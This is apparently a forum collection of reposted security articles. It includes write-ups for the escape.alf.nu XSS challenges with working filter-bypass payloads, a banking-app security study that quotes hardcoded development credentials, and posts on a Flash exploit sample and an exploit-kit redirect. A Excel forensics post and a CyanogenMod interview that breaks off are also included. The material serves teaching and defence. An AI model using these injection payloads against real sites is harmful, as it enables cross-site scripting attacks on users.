"alert(1);\/*<!--<script>*\/if(\/a\/\/*"; URL: if(alert(1).test(url)) console.log("Bad url: " + url); else new Image().src = url; </script>[/TD] [/TR] [/TABLE] Level 15: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8[/TD] [TD=class: code]function escape(s) { return s.split('#').map(function(v) { // Only 20% of slashes are end tags; save 1.2% of total // bytes by only escaping those. var json = JSON.stringify(v).replace(/<\//g, '<\\/'); return '<script>console.log('+json+')</script>'; }).join(''); }[/TD] [/TR] [/TABLE] We can use the same trick we used for level 14. We can start with something simple like: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]payload1#payload2[/TD] [/TR] [/TABLE] that will render: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]<script>console.log("payload1")</script><script>console.log("payload2")</script>[/TD] [/TR] [/TABLE] We can take advantage of HTML5 “<!—<script>” trick to change the way the parser treats the code between the two blocks and inject our “alert(1)” payload. Note that this trick only works in HTML5 documents and we will need to inject a closing “—>” since it is not present in the code The solution is: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]<!--<script>#)/;alert(1)//-->[/TD] [/TR] [/TABLE] This will render: Since we transition to “script data double escaped state” when the parser finds “<!—<script>”, the JS engine will receive the following valid JS expression: That can be interpreted as: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]console.log("junk_string") < /junk_regexp/ ; alert(1) // -->[/TD] [/TR] [/TABLE] Where: junk_string: <!—<script> junk_regexp: script><script>console.log(“) Actually you can see in the console that the first console.log writes ‘<!—<script>’ In order to make it even shorter we can replace “//” with unicode \u2028 as suggested by Mario Level 16: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23[/TD] [TD=class: code]function escape(text) { // *cough* not done var i = 0; window.the_easy_but_expensive_way_out = function() { alert(i++) }; // "A JSON text can be safely passed into JavaScript's eval() function // (which compiles and executes a string) if all the characters not // enclosed in strings are in the set of characters that form JSON // tokens." if (!(/[^,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]/.test( text.replace(/"(\\.|[^"\\])*"/g, '')))) { try { var val = eval('(' + text + ')'); console.log('' + val); } catch (_) { console.log('Crashed: '+_); } } else { console.log('Rejected.'); } }[/TD] [/TR] [/TABLE] This level is based on a real world filter described by Stefano Di Paola in this post If we study the regexp carefully we will see that the letter “s” is allowed since its within the “u-r” interval, that allows us to use the word “self” and with that we can craft a valid JSON payload. The trick is that we will be adding “0” to our object so the JS engine will need to calculate the valueOf our object. So if we define the “valueOf” function as the “the_easy_but_expensive_way_out” global function, we will be able to invoke it during the arithmetic operation. The problem is that it will alert “0” since “i” its initialized with “0”, but we can do it twice to alert a “1”. Long Solution: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]{"valueOf":self["the_easy_but_expensive_way_out"]}+0,{"valueOf":self["the_easy_but_expensive_way_out"]}[/TD] [/TR] [/TABLE] That is a nice trick to execute a function when parenthesis are not allowed. But there some more like Gareth famous one: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]onerror=eval;throw['=1;alert\x281\x29'][/TD] [/TR] [/TABLE] You can get a shorter solution for IE only as explained by Stefano Di Paola in his post [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]{"valueOf":self["location"],"toString":[]["join"],0:"javascript:alert(1)","length":1}[/TD] [/TR] [/TABLE] And thats all folks, thanks for reading! Posted by Alvaro Muñoz Jan 8th, 2014 Sursa: escape.alf.nu XSS Challenges Write-ups (Part 2) - PwnTesting
-
[h=1]escape.alf.nu XSS Challenges Write-ups[/h] These are my solutions to Erling Ellingsen escape.alf.nu XSS challenges. I found them very interesting and I learnt a lot from them (especially from the last ones to be published in Part 2). Im publishing my results since the game has been online for a long time now and there are already some sites with partial results. My suggestion, if you havent done it so far, is to go and try to solve them by yourselves…. so come on, dont be lazy, stop reading here and give them a try … … … … … Ok so if you have already solve them or need some hits, here are my solutions [h=1]Level 0:[/h] [TABLE] [TR] [TD=class: gutter] 1 2 3 4 5 [/TD] [TD=class: code] function escape(s) { // Warmup. return '<script>console.log("'+s+'");</script>'; } [/TD] [/TR] [/TABLE] There is no encoding so the easiest solution is to close “log” call and inject our “alert” Solution: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] ");alert(1," [/TD] [/TR] [/TABLE] [h=1]Level 1:[/h] [TABLE] [TR] [TD=class: gutter] 1 2 3 4 5 [/TD] [TD=class: code] function escape(s) { // Escaping scheme courtesy of Adobe Systems, Inc. s = s.replace(/"/g, '\\"'); return '<script>console.log("' + s + '");</script>'; } [/TD] [/TR] [/TABLE] Function is escaping double quotes by adding two slashes. Shortest solution is to inject \“ so the escape function turns it into [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] \\\" [/TD] [/TR] [/TABLE] Effectively escaping the backslash but not the double quotes. Solution: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] \");alert(1)// [/TD] [/TR] [/TABLE] [h=1]Level 2:[/h] [TABLE] [TR] [TD=class: gutter] 1 2 3 4 [/TD] [TD=class: code] function escape(s) { s = JSON.stringify(s); return '<script>console.log(' + s + ');</script>'; } [/TD] [/TR] [/TABLE] JSON.stringify() will escape double quotes (“) into (\”) but it does not escaps angle brackets (<>), so we can close the current script block and start a brand new one. Solution: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] </script><script>alert(1)// [/TD] [/TR] [/TABLE] [h=1]Level 3:[/h] [TABLE] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 [/TD] [TD=class: code] function escape(s) { var url = 'javascript:console.log(' + JSON.stringify(s) + ')'; console.log(url); var a = document.createElement('a'); a.href = url; document.body.appendChild(a); a.click(); } [/TD] [/TR] [/TABLE] Again (“) is escaped but since we are within a URL context we can use URL encoding. In this case %22 for (”) Solution: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] %22);alert(1)// [/TD] [/TR] [/TABLE] [h=1]Level 4:[/h] [TABLE] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 [/TD] [TD=class: code] function escape(s) { var text = s.replace(/</g, '<').replace('"', '"'); // URLs text = text.replace(/(http:\/\/\S+)/g, '<a href="$1">$1</a>'); // [[img123|Description]] text = text.replace(/\[\[(\w+)\|(.+?)\]\]/g, '<img alt="$2" src="$1.gif">'); return text; } [/TD] [/TR] [/TABLE] The following characters are replaced: < ? < (all ocurrences) " ? " (just the first occurrence) The escape function also use a template like [[src|alt]] that becomes [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] <img alt="alt" src="src.gif"> [/TD] [/TR] [/TABLE] We can use this template with any src and an alt starting with a double quote (“) that will be escaped, a second double quote (”) that won’t be escaped and then a new event handler like onload=“alert(1) that will be closed by the double quote inserted by the template. Solution: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] [[a|""onload="alert(1)]] [/TD] [/TR] [/TABLE] It will be rendered as: [h=1]Level 5:[/h] [TABLE] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 10 11 [/TD] [TD=class: code] function escape(s) { // Level 4 had a typo, thanks Alok. // If your solution for 4 still works here, you can go back and get more points on level 4 now. var text = s.replace(/</g, '<').replace(/"/g, '"'); // URLs text = text.replace(/(http:\/\/\S+)/g, '<a href="$1">$1</a>'); // [[img123|Description]] text = text.replace(/\[\[(\w+)\|(.+?)\]\]/g, '<img alt="$2" src="$1.gif">'); return text; } [/TD] [/TR] [/TABLE] Now we cannot rely on the (“) regexp typo but we can still use the template function to generate an image tag executing our alert(1) when loaded. We will use any src and a URL that will be replaced by the second replace function. Solution: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] [[a|http://onload='alert(1)']] [/TD] [/TR] [/TABLE] The first replace function wont trigger with this payload The second replace function will act on the URL getting: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] [[a|<a href=http://onload='alert(1)]]">http://onload='alert(1)']]</a> [/TD] [/TR] [/TABLE] The third replace function will create our img tag [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] <img alt="<a href="http://onload='alert(1)']]">http://onload='alert(1)'" src="a.gif"> [/TD] [/TR] [/TABLE] It will be rendered as: [h=1]Level 6:[/h] [TABLE] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 10 [/TD] [TD=class: code] function escape(s) { // Slightly too lazy to make two input fields. // Pass in something like "TextNode#foo" var m = s.split(/#/); // Only slightly contrived at this point. var a = document.createElement('div'); a.appendChild(document['create'+m[0]].apply(document, m.slice(1))); return a.innerHTML; } [/TD] [/TR] [/TABLE] The trick is to review all the functions in the DOM that begin with “create” and that dont escape characters. The shortest one is to use “createComment”. For example Comment#<foo> will create the following code: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] <!--<foo>--> [/TD] [/TR] [/TABLE] From there, its easy to go to: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] Comment#><svg onload=alert(1) [/TD] [/TR] [/TABLE] That will render: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] <!--><svg onload=alert(1)--> [/TD] [/TR] [/TABLE] [h=1]Level 7:[/h] [TABLE] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 [/TD] [TD=class: code] function escape(s) { // Pass inn "callback#userdata" var thing = s.split(/#/); if (!/^[a-zA-Z\[\]']*$/.test(thing[0])) return 'Invalid callback'; var obj = {'userdata': thing[1] }; var json = JSON.stringify(obj).replace(/</g, '\\u003c'); return "<script>" + thing[0] + "(" + json +")</script>"; } [/TD] [/TR] [/TABLE] We will enclose the opening bracket and the json fixed contents with single quotes to transform it into a string and then we will be able to inject our js payload: Solution: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] '#';alert(1)// [/TD] [/TR] [/TABLE] It will render: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] <script>'({"userdata":"';alert(1)//"})</script> [/TD] [/TR] [/TABLE] [h=1]Level 8:[/h] [TABLE] [TR] [TD=class: gutter] 1 2 3 4 [/TD] [TD=class: code] function escape(s) { // Courtesy of Skandiabanken return '<script>console.log("' + s.toUpperCase() + '")</script>'; } [/TD] [/TR] [/TABLE] There is no escaping function, only an upper case, so we can close the exisiting <script> tag and create a new tag (case insensitive) with an onload script using no alpha characters: These are some valid solutions: [TABLE] [TR] [TD=class: gutter] 1 2 3 [/TD] [TD=class: code] </script><svg><script>alert(1)// (52) </script><svg onload=alert(1)// (51) </script><svg onload=alert(1)// (50) [/TD] [/TR] [/TABLE] I guess people solving the challange with 28 characters or so did something like: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] </script><script src="<very short domain>"> [/TD] [/TR] [/TABLE] Posted by Alvaro Muñoz Jan 6th, 2014 Sursa: escape.alf.nu XSS Challenges Write-ups (Part 1) - PwnTesting
-
[h=3]CVE-2013-5331 evaded AV by using obscure Flash compression ZWS[/h] We recently came across what is likely the CVE-2013-5331 zero day (Adobe Flash in MS Office .doc) file on virustotal.com (Biglietto Visita.doc, MD5: 2192f9b0209b7e7aa6d32a075e53126d, 0 detections on 2013-11-11, 2/49 on 2013-12-23). The filename is Italian for "visit card" and could be related to MFA targeting in Italy. This exploit was patched 2013-12-10, and was in the wild for at least a full month. While it appears to be the only CVE-2013-5331 sample on Virustotal we could find, it's also interesting that the Flash exploit payload is a very unusual ZWS compression (LZMA as in Lempel–Ziv–Markov chain algorithm and originally used in 7zip). CWS or Gzip compression is the most commonly used. This compression method ZWS combined with embedding within MSOffice documents is very likely to evade most AV products. From our Cryptam Database Related files with similar metadata: 5da6a1d46641044b782d5c169ccb8fbf 2013-06-28 CVE-2012-5054 7/46 2013-07-07 8d70043395a2d0e87096c67e0d68f931 2013-06-28 CVE-2013-0633 6/46 2013 07-18 Posted by DT at 2:42 AM Sursa: malware tracker blog: CVE-2013-5331 evaded AV by using obscure Flash compression ZWS
-
Personal banking apps leak info through phone By Ariel Sanchez For several years I have been reading about flaws in home banking apps, but I was skeptical. To be honest, when I started this research I was not expecting to find any significant results. The goal was to perform a black box and static analysis of worldwide mobile home banking apps. The research used iPhone/iPad devices to test a total of 40 home banking apps from the top 60 most influential banks in the world. In order to obtain a global view of the state of security, some of the more important banks from the following countries were included in the research: Relevant Points The research was performed in 40 hours (non-consecutive). This research does not show the vulnerabilities found and how to exploit them in order to protect the owner of the app and their customers. All tests were only performed on the application (client side); the research excluded any server-side testing. Some of the affected banks were contacted and the vulnerabilities reported. Tests The following tests were performed for each application: Transport Security Plaintext Traffic Improper session handling Properly validate SSL certificates [*] Compiler Protection Anti-jailbreak protection Compiled with PIE Compiled with stack cookies Automatic Reference Counting [*] UIWebViews Data validation (input, output) Analyze UIWebView implementations [*] Insecure data storage SQLlite database File caching Check property list files Check log files [*] Logging Custom logs NSLog statements Crash reports files [*] Binary analysis Disassemble the application Detect obfuscation of the assembly code protections Detect anti-tampering protections Detect anti-debugging protections Protocol handlers Client-side injection Third-party libraries Summary All of the applications could be installed on a jailbroken iOS device. This helped speed up the static and black box analysis. Black Box Analysis Results The following tools were used for the black box analysis: otool (object file displaying tool)[1] Burp pro (proxy tool)[2] ssh (Secure Shell) 40% of the audited apps did not validate the authenticity of SSL certificates presented. This makes them susceptible to Man in The Middle (MiTM) attacks.[3] A few apps (less than 20%) did not have Position Independent Executable (PIE) and Stack Smashing Protection enabled. This could help to mitigate the risk of memory corruption attacks. >#otool –hv MobileBank MobileBank: Mach header magic cputype cpusubtype caps filetype ncmds sizeofcmds flags MH_MAGIC ARM V6 0x00 EXECUTE 24 3288 NOUNDEFS DYLDLINK PREBOUND TWOLEVEL Many of the apps (90%) contained several non-SSL links throughout the application. This allows an attacker to intercept the traffic and inject arbitrary JavaScript/HTML code in an attempt to create a fake login prompt or similar scam. Moreover, it was found that 50% of the apps are vulnerable to JavaScript injections via insecure UIWebView implementations. In some cases, the native iOS functionality was exposed, allowing actions such as sending SMS or emails from the victim’s device. A new generation of phishing attacks has become very popular in which the victim is prompted to retype his username and password “because the online banking password has expired”. The attacker steals the victim’s credentials and gains full access to the customer’s account. The following example shows a vulnerable UIWebView implementation from one of the home baking apps. It allows a false HTML form to be injected which an attacker can use to trick the user into entering their username and password and then send their credentials to a malicious site. Another concern brought to my attention while doing the research was that 70% of the apps did not have any alternative authentication solutions, such as multi-factor authentication, which could help to mitigate the risk of impersonation attacks. Most of the logs files generated by the apps, such as crash reports, exposed sensitive information. This information could be leaked and help attackers to find and develop 0day exploits with the intention of targeting users of the application. Most of the apps disclosed sensitive information through the Apple system log. The following example was extracted from the Console system using an iPhone Configuration Utility (IPCU) tool. The application dumps user credentials of the authentication process. … CA_DEBUG_TRANSACTIONS=1 in environment to log backtraces. Jun 22 16:20:37 Test Bankapp[2390] <Warning>: <v:Envelope xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:d="http://www.w3.org/2001/XMLSchema" xmlns:c="http://schemas.xmlsoap.org/soap/encoding/" xmlns:v="http://schemas.xmlsoap.org/soap/envelope/"> <v:Header /> <v:Body> <n0:loginWithRole id="o0" c:root="1" xmlns:n0="http://mobile.services.xxxxxxxxx.com/"> <in0 i:type="d:string">USER-ID</in1> <in1 i:type="d:string">XRS</in2> <in2 i:type="d:string">PASSWORD</in3> <in3 i:type="d:string">xxxxxxxx</in4> </n0:loginWithRole> </v:Body> </v:Envelope> Jun 22 16:20:37 Test Bankapp[2390] <Warning>: ]]]]]]]]]]]]] wxxx.xxxxx.com Jun 22 16:20:42 Test Bankapp[2390] <Warning>: RETURNED: Jun 22 16:20:42 Test Bankapp [2390] <Warning>: CoreAnimation: warning, deleted thread with uncommitted CATransaction; set CA_DEBUG_TRANSACTIONS=1 in environment to log backtraces. … Static Analysis Results The following tools were used for the static analysis and decryption: IDA PRO (disassembler tool) [4] Clutch (cracking utility) [5] objc-helper-plugin-ida [6] ssh (Secure Shell) gdb (debugger tool) IPCU [7] The binary code of each app was decrypting using Clutch. A combination of decrypted code and code disassembled with IDA PRO was used to analyze the application. Hardcoded development credentials were found in the code. __text:00056350 ADD R0, PC ; selRef_sMobileBankingURLDBTestEnv__ __text:00056352 MOVT.W R2, #0x46 __text:00056356 ADD R2, PC ; "https://mob_user:T3stepwd@db.internal/internal/db/start.do?login=mobileEvn" __text:00056358 LDR R1, [R0] ; "setMobileBankingURLDBTestEnv_iPad_mobil"... __text:0005635A MOV R0, R4 __text:0005635C BLX _objc_msgSend __text:00056360 MOV R0, (selRef_setMobileBankingURLDBTestEnvWithValue_iPad_mobileT_ - 0x56370) ; selRef_setMobileBankingURLDBTestEnvWithValue_iPad_mobileT_ __text:00056368 MOVW R2, #0xFA8A __text:0005636C ADD R0, PC ; selRef_setMobileBankingURLDBTestEnvWithValue_i_mobileT_ __text:0005636E MOVT.W R2, #0x46 __text:00056372 ADD R2, PC ; "https://mob_user:T3stepwd@db.internal/internal/db/start.do?login=mobileEvn&branch=%@&account=%@&subaccount=%@" __text:00056374 LDR R1, [R0] ; "setMobileBankingURLDBTestEnvWith_i"... __text:00056376 MOV R0, R4 __text:00056378 BLX _objc_msgSend By using hardcoded credentials, an attacker could gain access to the development infrastructure of the bank and infest the application with malware causing a massive infection for all of the application’s users. Internal functionality exposed via plaintext connections (HTTP) could allow an attacker with access to the network traffic to intercept or tamper with data. __text:0000C980 ADD R2, PC ; "http://%@/news/?version=%u" __text:0000C982 MOVT.W R3, #9 __text:0000C986 LDR R1, [R1] ; "stringWithFormat:" __text:0000C988 ADD R3, PC ; "Mecreditbank.com" __text:0000C98A STMEA.W SP, {R0,R5} __text:0000C98E MOV R0, R4 __text:0000C990 BLX _objc_msgSend __text:0000C994 MOV R2, R0 ... __text:0001AA70 LDR R4, [R2] ; _OBJC_CLASS_$_NSString __text:0001AA72 BLX _objc_msgSend __text:0001AA76 MOV R1, (selRef_stringWithFormat_ - 0x1AA8A) ; selRef_stringWithFormat_ __text:0001AA7E MOV R2, (cfstr_HttpAtmsOpList - 0x1AA8C) ; "http://%@/atms/?locale=%@&version=%u" __text:0001AA86 ADD R1, PC; selRef_stringWithFormat_ __text:0001AA88 ADD R2, PC; "http://%@/atms/version=%u" __text:0001AA8A __text:0001AA8A loc_1AA8A ; CODE XREF: -[branchesViewController processingVersion:]+146j __text:0001AA8A MOVW R3, #0x218C __text:0001AA8E LDR R1, [R1] __text:0001AA90 MOVT.W R3, #8 __text:0001AA94 STMEA.W SP, {R0,R5} __text:0001AA98 ADD R3, PC ; "Mecreditbank.com" __text:0001AA9A MOV R0, R4 __text:0001AA9C BLX _objc_msgSend Moreover, 20% of the apps sent activation codes for accounts though plainttext communication (HTTP). Even if this functionality is limited to initial account setup, the associated risk high. If an attacker intercepts the traffic he could hijack a session and steal the victim’s account without any notification or evidence to detect the attack. After taking a close look at the file system of each app, some of them used an unencrypted Sqlite database and stored sensitive information, such as details of customer’s banking account and transaction history. An attacker could use an exploit to access this data remotely, or if they have physical access to the device, could install jailbreak software in order to steal to the information from the file system of the victim’s device. The following example shows an Sqlite database structure taken from the file system of an app where bank account details were stored without encryption. Other minor information leaks were found, including: Internal IP addresses: __data:0008B590 _TakeMeToLocationURL DCD cfstr_Http10_1_4_133 __data:0008B590 ; DATA XREF: -[NavigationView viewDidLoad]+80o __data:0008B590 ; __nl_symbol_ptr:_TakeMeToLocationURL_ptro __data:0008B590 ; "http://100.10.1.13:8080/WebTestProject/PingTest.jsp" Internal file system paths: __cstring:000CC724 aUsersXXXXPro DCB "/Users/Scott/projects/HM_iphone/src/HBMonthView.m",0 Even though disclosing this information on its own doesn't have a significant impact, an attacker who collected a good number of these leaks could gain an understanding of the internal layout of the application and server-side infrastructure. This could enable an attacker to launch specific attacks targeting both the client- and server-side of the application. Conclusions From a defensive perspective, the following recommendations could mitigate the most common flaws: Ensure that all connections are performed using secure transfer protocols Enforce SSL certificate checks by the client application Protect sensitive data stored on the client-side by encrypting it using the iOS data protection API Improve additional checks to detect jailbroken devices Obfuscate the assembly code and use anti-debugging tricks to slow the progress of attackers when they try to reverse engineer the binary Remove all debugging statements and symbols Remove all development information from the production application Home banking apps that have been adapted for mobile devices, such as smart phones and tablets, have created a significant security challenge for worldwide financial firms. As this research shows, financial industries should increase the security standards they use for their mobile home banking solutions. References: [1]http://developer.apple.com/library/mac/#documentation/Darwin/Reference/ManPages/man1/otool.1.html [2] Burp Suite Editions [3] https://www.owasp.org/index.php/Man-in-the-middle_attack [4] https://www.hex-rays.com/products/ida/ [5] https://www.appaddict.org/forum/index.php?/topic/40-how-to-crack-ios-apps/ [6] https://github.com/zynamics/objc-helper-plugin-ida [7] Apple - Support - Downloads Cesar at 7:00 AM Sursa: IOActive Labs Research: Personal banking apps leak info through phone
-
[h=3]MS Excel 2013 Last Saved Location Metadata[/h] The release of Microsoft Office 2013 granted the ability to save files in formats not previously available (such as "Strict OOXML"), but the default format remained the same as Office 2007 and 2010. Despite the common file format, I've found that Microsoft Excel 2013 spreadsheets maintain additional metadata not available in earlier versions of Excel. Specifically, it appears that the absolute path to the directory in which the spreadsheet was last saved is maintained by Excel 2013 spreadsheets. I have not yet found a tool that presents the last saved location with other metadata from an Excel 2013 spreadsheet, but this information can easily be found by opening the "workbook.xml" file embedded in the parent spreadsheet. Simply changing the file extension from "xlsx" to "zip" and using a zip-extraction utility to extract the contents of the spreadsheet is a quick way to gain access to the embedded files without requiring any specialized tools. Workbook.xml contains information about the Excel file such as worksheet names, window height and width parameters, and a bit of other information. For the most part, this XML file appears to be similar across files created using Excel 2007, 2010, and 2013, however, there is one key difference: the "x15ac:absPath" element. The "x15ac:absPath" element is a child element of "mc:Choice" (which is a child element of "mc:AlternateContent") and contains an attribute called "url" that corresponds to the last saved location of the spreadsheet. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Workbook.xml file from Excel 2013[/TD] [/TR] [/TABLE] Information from the "url" attribute could be helpful in many cases, particularly those in which the previous location of a spreadsheet is significant. For example, examining this metadata field in a spreadsheet copied to a USB device could allow the examiner to identify the previous directory in which the spreadsheet was saved (before it was copied to the USB device). It's important to note, however, that resaving a 2013 spreadsheet using Excel 2007 or 2010 appears to remove the "x15ac:absPath" element. If you know that a spreadsheet was created using Excel 2013 but are unable to find the last saved location metadata, it's possible that the spreadsheet was last saved in a version of Excel other than 2013. This can be verified through the "fileVersion" element, which is the first child element of "workbook". The "fileVersion" element includes an attribute called "lastEdited" and, according to Microsoft documentation, the "lastEdited" attribute "specifies the version of the application that last saved the workbook". Interestingly, the value specified in the "lastEdited" attribute is not consistent with the application version of Excel (i.e. 2007=12.x, 2010=14.x, etc.). Instead, this value is a single-digit numeral corresponding to a particular version of Excel. I've ran some quick tests using 2007, 2010, and 2013 and summarized the corresponding fileVersion values for each Excel version in the table below. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]fileVersion Value to Excel Version Mapping[/TD] [/TR] [/TABLE] Importantly, Excel 2013 is aware of the last saved location metadata and will clear this information if the user elects to do so using Excel's built-in Document Inspector. Otherwise, this data should travel with the file until it is saved again, at which point this metadata will either be removed or updated (depending on the version of Excel that saved the file). [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Excel 2013 Document Inspector identifies Last Saved Location Metadata[/TD] [/TR] [/TABLE] Posted by Jason Hale at 11:35 PM Sursa: Digital Forensics Stream: MS Excel 2013 Last Saved Location Metadata
-
Banking apps: insecure and badly written, say researchers Buggy code, bad security By Richard Chirgwin, 13th January 2014 Security researchers IO Active are warning that many smartphone banking apps are leaky and need to be fixed. Testing 40 iOS-based banking apps from 60 banks around the world, the research summary is pretty nerve-wracking: 40 per cent are vulnerable to man-in-the-middle attacks, because they don't validate the authenticity of SSL certificates presented by the server; 20 per cent lacked “Position Independent Executable (PIE) and Stack Smashing Protection enabled”, which IO Active says is used to help mitigate memory corruption attacks; Half the apps are vulnerable to cross-site-scripting (XSS) attacks; Over 40 per cent leave sensitive information in the system log; and Over 30 per cent use hard-coded credentials of some kind. Most worrying, however, are a couple of 90 per cent statistics: the number of apps that included non-SSL links, and the number that lack jailbreak detection. Even those with detection could still be installed: “All of the applications could be installed on a jailbroken iOS device. This helped speed up the static and black box analysis”, writes IO Active's Ariel Sanchez. By including non-SSL links in the apps, Sanchez says, an attacker could “intercept the traffic and inject arbitrary JavaScript/HTML code in an attempt to create a fake login prompt or similar scam.” “Moreover, it was found that 50% of the apps are vulnerable to JavaScript injections via insecure UIWebView implementations. In some cases, the native iOS functionality was exposed, allowing actions such as sending SMS or emails from the victim’s device,” he continues. This UIWebView implementation allows a false HTML form to be injected. Source: IO Active The IO Active post also details a number of other information leaks, including unencrypted data stored in sqlite databases, and information like IP addresses and application paths that could let a determined and skilled attacker draw inferences about the server-side infrastructure the app is talking to. The research only looked at the client side, Sanchez states, and where possible, IO Active notified banks of the vulnerabilities he identified. ® Sursa: Banking apps: insecure and badly written, say researchers • The Register
-
Sneaky Redirect to Exploit Kit Posted on January 12, 2014 by darryl While I was testing a Pinpoint update, I found a sneaky method to redirect unsuspecting users to Neutrino EK. This one was interesting to me so I thought I would document it here. Here’s the website I visited…looks suspicious already: There was a reference to an external Javascript file: The file is obfuscated Javascript which is a red flag: I found the malicious redirect, or so I thought… Long story short, this led nowhere. Going back to the main page, there is a call to a Flash file at the bottom. Reviewing the ActionScript reveals something interesting. It reads in a PNG file called “gray-bg.png”, extracts every other character, then evals it. The “PNG file is not a graphic file but a renamed text file. I used Converter to extract one character every two positions and got this: The URL leads to the Neutrino landing page. Sursa: Sneaky Redirect to Exploit Kit | Kahu Security
-
CyanogenMod: from bedroom Android hack to million dollar mobile OS Interview Third-party mod is set to hit the big time By Matthew Bolton January 11th CyanogenMod is one of the most popular third-party Android ROMs available, with over 8 million users. It's an operating system that's grown from the modding community into a mainstream alternative to what your current mobile phone offers. Hate Samsung's TouchWiz? Then CyanogenMod offers a more grown-up user interface. Fed up with HTC Sense or the vanilla look of pure Android on your Nexus? Then CM brings a viable alternative but there's a predicament that's been weighing on the minds of its development team. "I think that for every one person that does install CyanogenMod, there's maybe five or six that try but don't finish. I had one of our board members try to install it, and he actually gave up," laughs Koushik Dutta, one of CyanogenMod's lead developers (known to the community as Koush). The problem of getting people to actually use its software isn't something the CyanogenMod team has taken lightly. In fact, it's one of the spurs that has pushed the team into turning its community-based, open-source Android spin-off into a full-on business venture: Cyanogen Inc. With $7 million in funding behind it, the core CM team, including Koush and CyanogenMod's founder Steve Kondik (known as Cyanogen), is now working on turning the enthusiast-friendly ROM into a mainstream hit. And the first challenge is making it easy to install. Jumping hurdles "What we hear from everybody is that, 'Yeah, I share this with my friends and I think it's great, but then I tell them what they have to do to install it and they bail'," says Kondik. "So we've made this installer. We say it's one-click, though in reality it's more like three clicks. But we've been doing some pretty extensive usability testing on it, because the big goal here is to get CM to as many people as possible. "We think that the whole walled garden approach is fine, but it's getting tired, and people want an alternative, and we've absolutely proven that. By having this installer, the current growth is just going to go crazy. It's just going to sky rocket." The team behind CyanogenModHe's not joking – after announcing the Cyanogen business, the brand new servers were brought to their knees from 38 million downloads in just one month. And the team was keen to point out that, while the installer is seen as the crucial first step to making CM more popular outside of hardcore Android users, it's only the beginning. "We need to make it really easy to install, and then we have to start building compelling reasons for people to install it," says Koush. "We need to make CyanogenMod really easy to install, and then we have to start building compelling reasons for people to install it." "Right now, the main reason people install it is because what is out there is just… not very good. And I don't want the reason that users come to us to be because the competition isn't good. I want the reason users come to us to be because we're awesome." To get to a point where users are being attracted to CM, the team is taking a few different approaches. One aspect is to build more useful services into the operating system, including network-based services. "We're contracting a really notable security researcher, Moxie Marlinspike, to build a secure messaging/iMessage product for us," says Koush. In with the new Another big change will be getting CM installed on phones as the default operating system, starting with a partnership with Oppo on the N1, a new flagship phone. "Oppo had given us support in the past, and when we were forming the company, I told them what was going on. For the global release of the N1, there's an officially supported version of CM, and there's also going to be a limited edition that will actually run CM by default," says Kondik. The Oppo N1 is the first of many official devices"This is just the beginning of bigger things, really. We have the chance to do some experimentation and get everything in place to support something like this, and then next year we'll do something bigger. It's got to be done right, though. "You can't just put some branding on a phone and sell it. You've got to provide something that you can't get elsewhere, especially if you want to make money off the thing. It's going to be important to have a really great platform, really great services. People aren't just going to shell out $800 for a device unless it's really giving them something that they can't get elsewhere." One way to do this is be on a device from a new company, and that's exactly what was announced at CES 2014. It was revealed that Cyanogen Inc was teaming up with a new mobile venture from China - OnePlus. The link? The founder of OnePlus is Pete Lau, a former VP of Oppo. Mass appeal Another opportunity is to use the team's knowledge, and the flexibility of CM's Android roots, to make something new that appeals to a different audience. "CM is absolutely perfect for people who are technical, and everything is designed for people who are technical. We don't want to dumb it down, but we want to wrap some of that stuff in a prettier face. Sometime next year, we're planning on launching something quite a bit bigger that's geared more towards a broader market," says Kondik. "We don't want to dumb CyanogenMod down, but we want to wrap some of that stuff in a prettier face." These plans help to explain why the team wanted to take the chance to push CM further by creating a business around it, but the decision understandably caused some concerns from the community, while some contributors wanted to know whether they would get paid a portion of the new business money for the work they put in. "I think some of the younger guys have this vision that Steve and I got written this seven million dollar check that went into our bank accounts," says Koush. "The money that we got is to build a business, so it's hiring people, paying them, building out an office, paying for the servers that have been donated for so long, paying for bandwidth… Paying for so many different things that it's scary looking through the transactions of our bank account." Keeping competitive The new company has also announced that some of the work it will do will be proprietary, leading to concerns over the future of the open-source project. Kondik understands these fears, but is fairly bullish that they're unfounded. "When you look at Android, it was done with a very specific goal in mind – to really screw up an industry that had gone so far down the proprietary software route 